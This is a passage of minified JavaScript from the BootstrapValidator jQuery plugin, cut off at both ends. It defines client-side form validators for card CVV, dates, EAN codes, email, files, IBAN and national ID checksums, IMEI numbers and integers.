s=a.val();if(""===s)return!0;if(!/^[0-9]{3,4}$/.test(s))return!1;if(!r.creditCardField)return!0;var i=e.getFieldElements(r.creditCardField).val();if(""===i)return!0;i=i.replace(/\D/g,"");var n,o,l={AMERICAN_EXPRESS:{length:[15],prefix:["34","37"]},DINERS_CLUB:{length:[14],prefix:["300","301","302","303","304","305","36"]},DINERS_CLUB_US:{length:[16],prefix:["54","55"]},DISCOVER:{length:[16],prefix:["6011","622126","622127","622128","622129","62213","62214","62215","62216","62217","62218","62219","6222","6223","6224","6225","6226","6227","6228","62290","62291","622920","622921","622922","622923","622924","622925","644","645","646","647","648","649","65"]},JCB:{length:[16],prefix:["3528","3529","353","354","355","356","357","358"]},LASER:{length:[16,17,18,19],prefix:["6304","6706","6771","6709"]},MAESTRO:{length:[12,13,14,15,16,17,18,19],prefix:["5018","5020","5038","6304","6759","6761","6762","6763","6764","6765","6766"]},MASTERCARD:{length:[16],prefix:["51","52","53","54","55"]},SOLO:{length:[16,18,19],prefix:["6334","6767"]},UNIONPAY:{length:[16,17,18,19],prefix:["622126","622127","622128","622129","62213","62214","62215","62216","62217","62218","62219","6222","6223","6224","6225","6226","6227","6228","62290","62291","622920","622921","622922","622923","622924","622925"]},VISA:{length:[16],prefix:["4"]}},d=null;for(n in l)for(o in l[n].prefix)if(i.substr(0,l[n].prefix[o].length)===l[n].prefix[o]&&-1!==t.inArray(i.length,l[n].length)){d=n;break}return null===d?!1:"AMERICAN_EXPRESS"===d?4===s.length:3===s.length}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.date=t.extend(t.fn.bootstrapValidator.i18n.date||{},{"default":"Please enter a valid date"}),t.fn.bootstrapValidator.validators.date={html5Attributes:{message:"message",format:"format",separator:"separator"},validate:function(e,a,r){var s=a.val();if(""===s)return!0;r.format=r.format||"MM/DD/YYYY";var i=r.format.split(" "),n=i[0],o=i.length>1?i[1]:null,l=i.length>2?i[2]:null,d=s.split(" "),u=d[0],f=d.length>1?d[1]:null;if(i.length!==d.length)return!1;var p=r.separator;if(p||(p=-1!==u.indexOf("/")?"/":-1!==u.indexOf("-")?"-":null),null===p||-1===u.indexOf(p))return!1;if(u=u.split(p),n=n.split(p),u.length!==n.length)return!1;var c=u[t.inArray("YYYY",n)],v=u[t.inArray("MM",n)],h=u[t.inArray("DD",n)];if(!c||!v||!h)return!1;var b=null,A=null,m=null;if(o){if(o=o.split(":"),f=f.split(":"),o.length!==f.length)return!1; if(A=f.length>0?f[0]:null,b=f.length>1?f[1]:null,m=f.length>2?f[2]:null,m&&(m=parseInt(m,10),isNaN(m)||0>m||m>60))return!1;if(A&&(A=parseInt(A,10),isNaN(A)||0>A||A>=24||l&&A>12))return!1;if(b&&(b=parseInt(b,10),isNaN(b)||0>b||b>59))return!1}return t.fn.bootstrapValidator.helpers.date(c,v,h)}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.different=t.extend(t.fn.bootstrapValidator.i18n.different||{},{"default":"Please enter a different value"}),t.fn.bootstrapValidator.validators.different={html5Attributes:{message:"message",field:"field"},validate:function(t,e,a){var r=e.val();if(""===r)return!0;var s=t.getFieldElements(a.field);return null===s?!0:r!==s.val()?(t.updateStatus(a.field,t.STATUS_VALID,"different"),!0):!1}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.digits=t.extend(t.fn.bootstrapValidator.i18n.digits||{},{"default":"Please enter only digits"}),t.fn.bootstrapValidator.validators.digits={validate:function(t,e,a){var r=e.val();return""===r?!0:/^\d+$/.test(r)}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.ean=t.extend(t.fn.bootstrapValidator.i18n.ean||{},{"default":"Please enter a valid EAN number"}),t.fn.bootstrapValidator.validators.ean={validate:function(t,e,a){var r=e.val();if(""===r)return!0;if(!/^(\d{8}|\d{12}|\d{13})$/.test(r))return!1;for(var s=r.length,i=0,n=8===s?[3,1]:[1,3],o=0;s-1>o;o++)i+=parseInt(r.charAt(o),10)*n[o%2];return i=(10-i%10)%10,i+""===r.charAt(s-1)}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.emailAddress=t.extend(t.fn.bootstrapValidator.i18n.emailAddress||{},{"default":"Please enter a valid email address"}),t.fn.bootstrapValidator.validators.emailAddress={enableByHtml5:function(t){return"email"===t.attr("type")},validate:function(t,e,a){var r=e.val();if(""===r)return!0;var s=/^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;return s.test(r)}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.file=t.extend(t.fn.bootstrapValidator.i18n.file||{},{"default":"Please choose a valid file"}),t.fn.bootstrapValidator.validators.file={html5Attributes:{extension:"extension",maxsize:"maxSize",message:"message",type:"type"},validate:function(e,a,r){var s=a.val();if(""===s)return!0;var i,n=r.extension?r.extension.toLowerCase().split(","):null,o=r.type?r.type.toLowerCase().split(","):null,l=window.File&&window.FileList&&window.FileReader;if(l)for(var d=a.get(0).files,u=d.length,f=0;u>f;f++){if(r.maxSize&&d[f].size>parseInt(r.maxSize,10))return!1;if(i=d[f].name.substr(d[f].name.lastIndexOf(".")+1),n&&-1===t.inArray(i.toLowerCase(),n))return!1;if(o&&-1===t.inArray(d[f].type.toLowerCase(),o))return!1}else if(i=s.substr(s.lastIndexOf(".")+1),n&&-1===t.inArray(i.toLowerCase(),n))return!1;return!0}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.greaterThan=t.extend(t.fn.bootstrapValidator.i18n.greaterThan||{},{"default":"Please enter a value greater than or equal to %s",notInclusive:"Please enter a value greater than %s"}),t.fn.bootstrapValidator.validators.greaterThan={html5Attributes:{message:"message",value:"value",inclusive:"inclusive"},enableByHtml5:function(t){var e=t.attr("min");return e?{value:e}:!1},validate:function(e,a,r){var s=a.val();if(""===s)return!0;var i=t.isNumeric(r.value)?r.value:e.getDynamicOption(a,r.value);return s=parseFloat(s),r.inclusive===!0||void 0===r.inclusive?{valid:s>=i,message:t.fn.bootstrapValidator.helpers.format(r.message||t.fn.bootstrapValidator.i18n.greaterThan["default"],i)}:{valid:s>i,message:t.fn.bootstrapValidator.helpers.format(r.message||t.fn.bootstrapValidator.i18n.greaterThan.notInclusive,i)}}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.grid=t.extend(t.fn.bootstrapValidator.i18n.grid||{},{"default":"Please enter a valid GRId number"}),t.fn.bootstrapValidator.validators.grid={validate:function(e,a,r){var s=a.val();return""===s?!0:(s=s.toUpperCase(),/^[GRID:]*([0-9A-Z]{2})[-\s]*([0-9A-Z]{5})[-\s]*([0-9A-Z]{10})[-\s]*([0-9A-Z]{1})$/g.test(s)?(s=s.replace(/\s/g,"").replace(/-/g,""),"GRID:"===s.substr(0,5)&&(s=s.substr(5)),t.fn.bootstrapValidator.helpers.mod37And36(s)):!1)}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.hex=t.extend(t.fn.bootstrapValidator.i18n.hex||{},{"default":"Please enter a valid hexadecimal number"}),t.fn.bootstrapValidator.validators.hex={validate:function(t,e,a){var r=e.val();return""===r?!0:/^[0-9a-fA-F]+$/.test(r)}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.hexColor=t.extend(t.fn.bootstrapValidator.i18n.hexColor||{},{"default":"Please enter a valid hex color"}),t.fn.bootstrapValidator.validators.hexColor={enableByHtml5:function(t){return"color"===t.attr("type")},validate:function(t,e,a){var r=e.val();return""===r?!0:/(^#[0-9A-F]{6}$)|(^#[0-9A-F]{3}$)/i.test(r)}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.iban=t.extend(t.fn.bootstrapValidator.i18n.iban||{},{"default":"Please enter a valid IBAN number",countryNotSupported:"The country code %s is not supported",country:"Please enter a valid IBAN number in %s",countries:{AD:"Andorra",AE:"United Arab Emirates",AL:"Albania",AO:"Angola",AT:"Austria",AZ:"Azerbaijan",BA:"Bosnia and Herzegovina",BE:"Belgium",BF:"Burkina Faso",BG:"Bulgaria",BH:"Bahrain",BI:"Burundi",BJ:"Benin",BR:"Brazil",CH:"Switzerland",CI:"Ivory Coast",CM:"Cameroon",CR:"Costa Rica",CV:"Cape Verde",CY:"Cyprus",CZ:"Czech Republic",DE:"Germany",DK:"Denmark",DO:"Dominican Republic",DZ:"Algeria",EE:"Estonia",ES:"Spain",FI:"Finland",FO:"Faroe Islands",FR:"France",GB:"United Kingdom",GE:"Georgia",GI:"Gibraltar",GL:"Greenland",GR:"Greece",GT:"Guatemala",HR:"Croatia",HU:"Hungary",IE:"Ireland",IL:"Israel",IR:"Iran",IS:"Iceland",IT:"Italy",JO:"Jordan",KW:"Kuwait",KZ:"Kazakhstan",LB:"Lebanon",LI:"Liechtenstein",LT:"Lithuania",LU:"Luxembourg",LV:"Latvia",MC:"Monaco",MD:"Moldova",ME:"Montenegro",MG:"Madagascar",MK:"Macedonia",ML:"Mali",MR:"Mauritania",MT:"Malta",MU:"Mauritius",MZ:"Mozambique",NL:"Netherlands",NO:"Norway",PK:"Pakistan",PL:"Poland",PS:"Palestinian",PT:"Portugal",QA:"Qatar",RO:"Romania",RS:"Serbia",SA:"Saudi Arabia",SE:"Sweden",SI:"Slovenia",SK:"Slovakia",SM:"San Marino",SN:"Senegal",TN:"Tunisia",TR:"Turkey",VG:"Virgin Islands, British"}}),t.fn.bootstrapValidator.validators.iban={html5Attributes:{message:"message",country:"country"},REGEX:{AD:"AD[0-9]{2}[0-9]{4}[0-9]{4}[A-Z0-9]{12}",AE:"AE[0-9]{2}[0-9]{3}[0-9]{16}",AL:"AL[0-9]{2}[0-9]{8}[A-Z0-9]{16}",AO:"AO[0-9]{2}[0-9]{21}",AT:"AT[0-9]{2}[0-9]{5}[0-9]{11}",AZ:"AZ[0-9]{2}[A-Z]{4}[A-Z0-9]{20}",BA:"BA[0-9]{2}[0-9]{3}[0-9]{3}[0-9]{8}[0-9]{2}",BE:"BE[0-9]{2}[0-9]{3}[0-9]{7}[0-9]{2}",BF:"BF[0-9]{2}[0-9]{23}",BG:"BG[0-9]{2}[A-Z]{4}[0-9]{4}[0-9]{2}[A-Z0-9]{8}",BH:"BH[0-9]{2}[A-Z]{4}[A-Z0-9]{14}",BI:"BI[0-9]{2}[0-9]{12}",BJ:"BJ[0-9]{2}[A-Z]{1}[0-9]{23}",BR:"BR[0-9]{2}[0-9]{8}[0-9]{5}[0-9]{10}[A-Z][A-Z0-9]",CH:"CH[0-9]{2}[0-9]{5}[A-Z0-9]{12}",CI:"CI[0-9]{2}[A-Z]{1}[0-9]{23}",CM:"CM[0-9]{2}[0-9]{23}",CR:"CR[0-9]{2}[0-9]{3}[0-9]{14}",CV:"CV[0-9]{2}[0-9]{21}",CY:"CY[0-9]{2}[0-9]{3}[0-9]{5}[A-Z0-9]{16}",CZ:"CZ[0-9]{2}[0-9]{20}",DE:"DE[0-9]{2}[0-9]{8}[0-9]{10}",DK:"DK[0-9]{2}[0-9]{14}",DO:"DO[0-9]{2}[A-Z0-9]{4}[0-9]{20}",DZ:"DZ[0-9]{2}[0-9]{20}",EE:"EE[0-9]{2}[0-9]{2}[0-9]{2}[0-9]{11}[0-9]{1}",ES:"ES[0-9]{2}[0-9]{4}[0-9]{4}[0-9]{1}[0-9]{1}[0-9]{10}",FI:"FI[0-9]{2}[0-9]{6}[0-9]{7}[0-9]{1}",FO:"FO[0-9]{2}[0-9]{4}[0-9]{9}[0-9]{1}",FR:"FR[0-9]{2}[0-9]{5}[0-9]{5}[A-Z0-9]{11}[0-9]{2}",GB:"GB[0-9]{2}[A-Z]{4}[0-9]{6}[0-9]{8}",GE:"GE[0-9]{2}[A-Z]{2}[0-9]{16}",GI:"GI[0-9]{2}[A-Z]{4}[A-Z0-9]{15}",GL:"GL[0-9]{2}[0-9]{4}[0-9]{9}[0-9]{1}",GR:"GR[0-9]{2}[0-9]{3}[0-9]{4}[A-Z0-9]{16}",GT:"GT[0-9]{2}[A-Z0-9]{4}[A-Z0-9]{20}",HR:"HR[0-9]{2}[0-9]{7}[0-9]{10}",HU:"HU[0-9]{2}[0-9]{3}[0-9]{4}[0-9]{1}[0-9]{15}[0-9]{1}",IE:"IE[0-9]{2}[A-Z]{4}[0-9]{6}[0-9]{8}",IL:"IL[0-9]{2}[0-9]{3}[0-9]{3}[0-9]{13}",IR:"IR[0-9]{2}[0-9]{22}",IS:"IS[0-9]{2}[0-9]{4}[0-9]{2}[0-9]{6}[0-9]{10}",IT:"IT[0-9]{2}[A-Z]{1}[0-9]{5}[0-9]{5}[A-Z0-9]{12}",JO:"JO[0-9]{2}[A-Z]{4}[0-9]{4}[0]{8}[A-Z0-9]{10}",KW:"KW[0-9]{2}[A-Z]{4}[0-9]{22}",KZ:"KZ[0-9]{2}[0-9]{3}[A-Z0-9]{13}",LB:"LB[0-9]{2}[0-9]{4}[A-Z0-9]{20}",LI:"LI[0-9]{2}[0-9]{5}[A-Z0-9]{12}",LT:"LT[0-9]{2}[0-9]{5}[0-9]{11}",LU:"LU[0-9]{2}[0-9]{3}[A-Z0-9]{13}",LV:"LV[0-9]{2}[A-Z]{4}[A-Z0-9]{13}",MC:"MC[0-9]{2}[0-9]{5}[0-9]{5}[A-Z0-9]{11}[0-9]{2}",MD:"MD[0-9]{2}[A-Z0-9]{20}",ME:"ME[0-9]{2}[0-9]{3}[0-9]{13}[0-9]{2}",MG:"MG[0-9]{2}[0-9]{23}",MK:"MK[0-9]{2}[0-9]{3}[A-Z0-9]{10}[0-9]{2}",ML:"ML[0-9]{2}[A-Z]{1}[0-9]{23}",MR:"MR13[0-9]{5}[0-9]{5}[0-9]{11}[0-9]{2}",MT:"MT[0-9]{2}[A-Z]{4}[0-9]{5}[A-Z0-9]{18}",MU:"MU[0-9]{2}[A-Z]{4}[0-9]{2}[0-9]{2}[0-9]{12}[0-9]{3}[A-Z]{3}",MZ:"MZ[0-9]{2}[0-9]{21}",NL:"NL[0-9]{2}[A-Z]{4}[0-9]{10}",NO:"NO[0-9]{2}[0-9]{4}[0-9]{6}[0-9]{1}",PK:"PK[0-9]{2}[A-Z]{4}[A-Z0-9]{16}",PL:"PL[0-9]{2}[0-9]{8}[0-9]{16}",PS:"PS[0-9]{2}[A-Z]{4}[A-Z0-9]{21}",PT:"PT[0-9]{2}[0-9]{4}[0-9]{4}[0-9]{11}[0-9]{2}",QA:"QA[0-9]{2}[A-Z]{4}[A-Z0-9]{21}",RO:"RO[0-9]{2}[A-Z]{4}[A-Z0-9]{16}",RS:"RS[0-9]{2}[0-9]{3}[0-9]{13}[0-9]{2}",SA:"SA[0-9]{2}[0-9]{2}[A-Z0-9]{18}",SE:"SE[0-9]{2}[0-9]{3}[0-9]{16}[0-9]{1}",SI:"SI[0-9]{2}[0-9]{5}[0-9]{8}[0-9]{2}",SK:"SK[0-9]{2}[0-9]{4}[0-9]{6}[0-9]{10}",SM:"SM[0-9]{2}[A-Z]{1}[0-9]{5}[0-9]{5}[A-Z0-9]{12}",SN:"SN[0-9]{2}[A-Z]{1}[0-9]{23}",TN:"TN59[0-9]{2}[0-9]{3}[0-9]{13}[0-9]{2}",TR:"TR[0-9]{2}[0-9]{5}[A-Z0-9]{1}[A-Z0-9]{16}",VG:"VG[0-9]{2}[A-Z]{4}[0-9]{16}"},validate:function(e,a,r){var s=a.val();if(""===s)return!0;s=s.replace(/[^a-zA-Z0-9]/g,"").toUpperCase();var i=r.country;if(i?"string"==typeof i&&this.REGEX[i]||(i=e.getDynamicOption(a,i)):i=s.substr(0,2),!this.REGEX[i])return{valid:!1,message:t.fn.bootstrapValidator.helpers.format(t.fn.bootstrapValidator.i18n.iban.countryNotSupported,i)};if(!new RegExp("^"+this.REGEX[i]+"$").test(s))return{valid:!1,message:t.fn.bootstrapValidator.helpers.format(r.message||t.fn.bootstrapValidator.i18n.iban.country,t.fn.bootstrapValidator.i18n.iban.countries[i])};s=s.substr(4)+s.substr(0,4),s=t.map(s.split(""),function(t){var e=t.charCodeAt(0);return e>="A".charCodeAt(0)&&e<="Z".charCodeAt(0)?e-"A".charCodeAt(0)+10:t}),s=s.join("");for(var n=parseInt(s.substr(0,1),10),o=s.length,l=1;o>l;++l)n=(10*n+parseInt(s.substr(l,1),10))%97;return{valid:1===n,message:t.fn.bootstrapValidator.helpers.format(r.message||t.fn.bootstrapValidator.i18n.iban.country,t.fn.bootstrapValidator.i18n.iban.countries[i])}}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.id=t.extend(t.fn.bootstrapValidator.i18n.id||{},{"default":"Please enter a valid identification number",countryNotSupported:"The country code %s is not supported",country:"Please enter a valid %s identification number",countries:{BA:"Bosnia and Herzegovina",BG:"Bulgarian",BR:"Brazilian",CH:"Swiss",CL:"Chilean",CZ:"Czech",DK:"Danish",EE:"Estonian",ES:"Spanish",FI:"Finnish",HR:"Croatian",IE:"Irish",IS:"Iceland",LT:"Lithuanian",LV:"Latvian",ME:"Montenegro",MK:"Macedonian",NL:"Dutch",RO:"Romanian",RS:"Serbian",SE:"Swedish",SI:"Slovenian",SK:"Slovak",SM:"San Marino",ZA:"South African"}}),t.fn.bootstrapValidator.validators.id={html5Attributes:{message:"message",country:"country"},COUNTRY_CODES:["BA","BG","BR","CH","CL","CZ","DK","EE","ES","FI","HR","IE","IS","LT","LV","ME","MK","NL","RO","RS","SE","SI","SK","SM","ZA"],validate:function(e,a,r){var s=a.val();if(""===s)return!0;var i=r.country;if(i?("string"!=typeof i||-1===t.inArray(i.toUpperCase(),this.COUNTRY_CODES))&&(i=e.getDynamicOption(a,i)):i=s.substr(0,2),-1===t.inArray(i,this.COUNTRY_CODES))return{valid:!1,message:t.fn.bootstrapValidator.helpers.format(t.fn.bootstrapValidator.i18n.id.countryNotSupported,i)};var n=["_",i.toLowerCase()].join("");return this[n](s)?!0:{valid:!1,message:t.fn.bootstrapValidator.helpers.format(r.message||t.fn.bootstrapValidator.i18n.id.country,t.fn.bootstrapValidator.i18n.id.countries[i.toUpperCase()])}},_validateJMBG:function(t,e){if(!/^\d{13}$/.test(t))return!1;var a=parseInt(t.substr(0,2),10),r=parseInt(t.substr(2,2),10),s=(parseInt(t.substr(4,3),10),parseInt(t.substr(7,2),10)),i=parseInt(t.substr(12,1),10);if(a>31||r>12)return!1;for(var n=0,o=0;6>o;o++)n+=(7-o)*(parseInt(t.charAt(o),10)+parseInt(t.charAt(o+6),10));if(n=11-n%11,(10===n||11===n)&&(n=0),n!==i)return!1;switch(e.toUpperCase()){case"BA":return s>=10&&19>=s;case"MK":return s>=41&&49>=s;case"ME":return s>=20&&29>=s;case"RS":return s>=70&&99>=s;case"SI":return s>=50&&59>=s;default:return!0}},_ba:function(t){return this._validateJMBG(t,"BA")},_mk:function(t){return this._validateJMBG(t,"MK")},_me:function(t){return this._validateJMBG(t,"ME")},_rs:function(t){return this._validateJMBG(t,"RS")},_si:function(t){return this._validateJMBG(t,"SI")},_bg:function(e){if(!/^\d{10}$/.test(e)&&!/^\d{6}\s\d{3}\s\d{1}$/.test(e))return!1;e=e.replace(/\s/g,"");var a=parseInt(e.substr(0,2),10)+1900,r=parseInt(e.substr(2,2),10),s=parseInt(e.substr(4,2),10);if(r>40?(a+=100,r-=40):r>20&&(a-=100,r-=20),!t.fn.bootstrapValidator.helpers.date(a,r,s))return!1;for(var i=0,n=[2,4,8,5,10,9,7,3,6],o=0;9>o;o++)i+=parseInt(e.charAt(o),10)*n[o];return i=i%11%10,i+""===e.substr(9,1)},_br:function(t){if(/^1{11}|2{11}|3{11}|4{11}|5{11}|6{11}|7{11}|8{11}|9{11}|0{11}$/.test(t))return!1;if(!/^\d{11}$/.test(t)&&!/^\d{3}\.\d{3}\.\d{3}-\d{2}$/.test(t))return!1;t=t.replace(/\./g,"").replace(/-/g,"");for(var e=0,a=0;9>a;a++)e+=(10-a)*parseInt(t.charAt(a),10);if(e=11-e%11,(10===e||11===e)&&(e=0),e+""!==t.charAt(9))return!1;var r=0;for(a=0;10>a;a++)r+=(11-a)*parseInt(t.charAt(a),10);return r=11-r%11,(10===r||11===r)&&(r=0),r+""===t.charAt(10)},_ch:function(t){if(!/^756[\.]{0,1}[0-9]{4}[\.]{0,1}[0-9]{4}[\.]{0,1}[0-9]{2}$/.test(t))return!1;t=t.replace(/\D/g,"").substr(3);for(var e=t.length,a=0,r=8===e?[3,1]:[1,3],s=0;e-1>s;s++)a+=parseInt(t.charAt(s),10)*r[s%2];return a=10-a%10,a+""===t.charAt(e-1)},_cl:function(t){if(!/^\d{7,8}[-]{0,1}[0-9K]$/i.test(t))return!1;for(t=t.replace(/\-/g,"");t.length<9;)t="0"+t;for(var e=0,a=[3,2,7,6,5,4,3,2],r=0;8>r;r++)e+=parseInt(t.charAt(r),10)*a[r];return e=11-e%11,11===e?e=0:10===e&&(e="K"),e+""===t.charAt(8).toUpperCase()},_cz:function(e){if(!/^\d{9,10}$/.test(e))return!1;var a=1900+parseInt(e.substr(0,2),10),r=parseInt(e.substr(2,2),10)%50%20,s=parseInt(e.substr(4,2),10);if(9===e.length){if(a>=1980&&(a-=100),a>1953)return!1}else 1954>a&&(a+=100);if(!t.fn.bootstrapValidator.helpers.date(a,r,s))return!1;if(10===e.length){var i=parseInt(e.substr(0,9),10)%11;return 1985>a&&(i%=10),i+""===e.substr(9,1)}return!0},_dk:function(e){if(!/^[0-9]{6}[-]{0,1}[0-9]{4}$/.test(e))return!1;e=e.replace(/-/g,"");var a=parseInt(e.substr(0,2),10),r=parseInt(e.substr(2,2),10),s=parseInt(e.substr(4,2),10);switch(!0){case-1!=="5678".indexOf(e.charAt(6))&&s>=58:s+=1800;break;case-1!=="0123".indexOf(e.charAt(6)):case-1!=="49".indexOf(e.charAt(6))&&s>=37:s+=1900;break;default:s+=2e3}return t.fn.bootstrapValidator.helpers.date(s,r,a)},_ee:function(t){return this._lt(t)},_es:function(t){if(!/^[0-9A-Z]{8}[-]{0,1}[0-9A-Z]$/.test(t)&&!/^[XYZ][-]{0,1}[0-9]{7}[-]{0,1}[0-9A-Z]$/.test(t))return!1;t=t.replace(/-/g,"");var e="XYZ".indexOf(t.charAt(0));-1!==e&&(t=e+t.substr(1)+"");var a=parseInt(t.substr(0,8),10);return a="TRWAGMYFPDXBNJZSQVHLCKE"[a%23],a===t.substr(8,1)},_fi:function(e){if(!/^[0-9]{6}[-+A][0-9]{3}[0-9ABCDEFHJKLMNPRSTUVWXY]$/.test(e))return!1;var a=parseInt(e.substr(0,2),10),r=parseInt(e.substr(2,2),10),s=parseInt(e.substr(4,2),10),i={"+":1800,"-":1900,A:2e3};if(s=i[e.charAt(6)]+s,!t.fn.bootstrapValidator.helpers.date(s,r,a))return!1;var n=parseInt(e.substr(7,3),10);if(2>n)return!1;var o=e.substr(0,6)+e.substr(7,3)+"";return o=parseInt(o,10),"0123456789ABCDEFHJKLMNPRSTUVWXY".charAt(o%31)===e.charAt(10)},_hr:function(e){return/^[0-9]{11}$/.test(e)?t.fn.bootstrapValidator.helpers.mod11And10(e):!1},_ie:function(t){if(!/^\d{7}[A-W][AHWTX]?$/.test(t))return!1;var e=function(t){for(;t.length<7;)t="0"+t;for(var e="WABCDEFGHIJKLMNOPQRSTUV",a=0,r=0;7>r;r++)a+=parseInt(t.charAt(r),10)*(8-r);return a+=9*e.indexOf(t.substr(7)),e[a%23]};return 9!==t.length||"A"!==t.charAt(8)&&"H"!==t.charAt(8)?t.charAt(7)===e(t.substr(0,7)):t.charAt(7)===e(t.substr(0,7)+t.substr(8)+"")},_is:function(e){if(!/^[0-9]{6}[-]{0,1}[0-9]{4}$/.test(e))return!1;e=e.replace(/-/g,"");var a=parseInt(e.substr(0,2),10),r=parseInt(e.substr(2,2),10),s=parseInt(e.substr(4,2),10),i=parseInt(e.charAt(9),10);if(s=9===i?1900+s:100*(20+i)+s,!t.fn.bootstrapValidator.helpers.date(s,r,a,!0))return!1;for(var n=0,o=[3,2,7,6,5,4,3,2],l=0;8>l;l++)n+=parseInt(e.charAt(l),10)*o[l];return n=11-n%11,n+""===e.charAt(8)},_lt:function(e){if(!/^[0-9]{11}$/.test(e))return!1;var a=parseInt(e.charAt(0),10),r=parseInt(e.substr(1,2),10),s=parseInt(e.substr(3,2),10),i=parseInt(e.substr(5,2),10),n=a%2===0?17+a/2:17+(a+1)/2;if(r=100*n+r,!t.fn.bootstrapValidator.helpers.date(r,s,i,!0))return!1;for(var o=0,l=[1,2,3,4,5,6,7,8,9,1],d=0;10>d;d++)o+=parseInt(e.charAt(d),10)*l[d];if(o%=11,10!==o)return o+""===e.charAt(10);for(o=0,l=[3,4,5,6,7,8,9,1,2,3],d=0;10>d;d++)o+=parseInt(e.charAt(d),10)*l[d];return o%=11,10===o&&(o=0),o+""===e.charAt(10)},_lv:function(e){if(!/^[0-9]{6}[-]{0,1}[0-9]{5}$/.test(e))return!1;e=e.replace(/\D/g,"");var a=parseInt(e.substr(0,2),10),r=parseInt(e.substr(2,2),10),s=parseInt(e.substr(4,2),10);if(s=s+1800+100*parseInt(e.charAt(6),10),!t.fn.bootstrapValidator.helpers.date(s,r,a,!0))return!1;for(var i=0,n=[10,5,8,4,2,1,6,3,7,9],o=0;10>o;o++)i+=parseInt(e.charAt(o),10)*n[o];return i=(i+1)%11%10,i+""===e.charAt(10)},_nl:function(t){for(;t.length<9;)t="0"+t;if(!/^[0-9]{4}[.]{0,1}[0-9]{2}[.]{0,1}[0-9]{3}$/.test(t))return!1;if(t=t.replace(/\./g,""),0===parseInt(t,10))return!1;for(var e=0,a=t.length,r=0;a-1>r;r++)e+=(9-r)*parseInt(t.charAt(r),10);return e%=11,10===e&&(e=0),e+""===t.charAt(a-1)},_ro:function(e){if(!/^[0-9]{13}$/.test(e))return!1;var a=parseInt(e.charAt(0),10);if(0===a||7===a||8===a)return!1;var r=parseInt(e.substr(1,2),10),s=parseInt(e.substr(3,2),10),i=parseInt(e.substr(5,2),10),n={1:1900,2:1900,3:1800,4:1800,5:2e3,6:2e3};if(i>31&&s>12)return!1;if(9!==a&&(r=n[a+""]+r,!t.fn.bootstrapValidator.helpers.date(r,s,i)))return!1;for(var o=0,l=[2,7,9,1,4,6,3,5,8,2,7,9],d=e.length,u=0;d-1>u;u++)o+=parseInt(e.charAt(u),10)*l[u];return o%=11,10===o&&(o=1),o+""===e.charAt(d-1)},_se:function(e){if(!/^[0-9]{10}$/.test(e)&&!/^[0-9]{6}[-|+][0-9]{4}$/.test(e))return!1;e=e.replace(/[^0-9]/g,"");var a=parseInt(e.substr(0,2),10)+1900,r=parseInt(e.substr(2,2),10),s=parseInt(e.substr(4,2),10);return t.fn.bootstrapValidator.helpers.date(a,r,s)?t.fn.bootstrapValidator.helpers.luhn(e):!1},_sk:function(t){return this._cz(t)},_sm:function(t){return/^\d{5}$/.test(t)},_za:function(e){if(!/^[0-9]{10}[0|1][8|9][0-9]$/.test(e))return!1;var a=parseInt(e.substr(0,2),10),r=(new Date).getFullYear()%100,s=parseInt(e.substr(2,2),10),i=parseInt(e.substr(4,2),10);return a=a>=r?a+1900:a+2e3,t.fn.bootstrapValidator.helpers.date(a,s,i)?t.fn.bootstrapValidator.helpers.luhn(e):!1}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.identical=t.extend(t.fn.bootstrapValidator.i18n.identical||{},{"default":"Please enter the same value"}),t.fn.bootstrapValidator.validators.identical={html5Attributes:{message:"message",field:"field"},validate:function(t,e,a){var r=e.val();if(""===r)return!0;var s=t.getFieldElements(a.field);return null===s?!0:r===s.val()?(t.updateStatus(a.field,t.STATUS_VALID,"identical"),!0):!1}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.imei=t.extend(t.fn.bootstrapValidator.i18n.imei||{},{"default":"Please enter a valid IMEI number"}),t.fn.bootstrapValidator.validators.imei={validate:function(e,a,r){var s=a.val();if(""===s)return!0;switch(!0){case/^\d{15}$/.test(s):case/^\d{2}-\d{6}-\d{6}-\d{1}$/.test(s):case/^\d{2}\s\d{6}\s\d{6}\s\d{1}$/.test(s):return s=s.replace(/[^0-9]/g,""),t.fn.bootstrapValidator.helpers.luhn(s);case/^\d{14}$/.test(s):case/^\d{16}$/.test(s):case/^\d{2}-\d{6}-\d{6}(|-\d{2})$/.test(s):case/^\d{2}\s\d{6}\s\d{6}(|\s\d{2})$/.test(s):return!0;default:return!1}}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.integer=t.extend(t.fn.bootstrapValidator.i18n.integer||{},{"default":"Please enter a valid number"}),t.fn.bootstrapValidator.validators.integer={enableByHtml5:function(t){return"number"===t.attr("type")&&(void 0===t.attr("step")||t.attr("step")%1===0)},validate:function(t,e,a){var r=e.val();return""===r?!0:/^(?:-?(?:0|[1-9][0-9]*))$/.test(r)}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.ip=t.extend(t.fn.bootstrapValidator.i18n.ip||{},{"default":"Please enter a valid IP address",ipv4:"Please enter a valid IPv4 address",ipv6:"Please enter a valid IPv6 address"}),t.fn.bootstrapValidator.validators.ip={html5Attributes:{message:"message",ipv4:"ipv4",ipv6:"ipv6"},validate:function(e,a,r){var 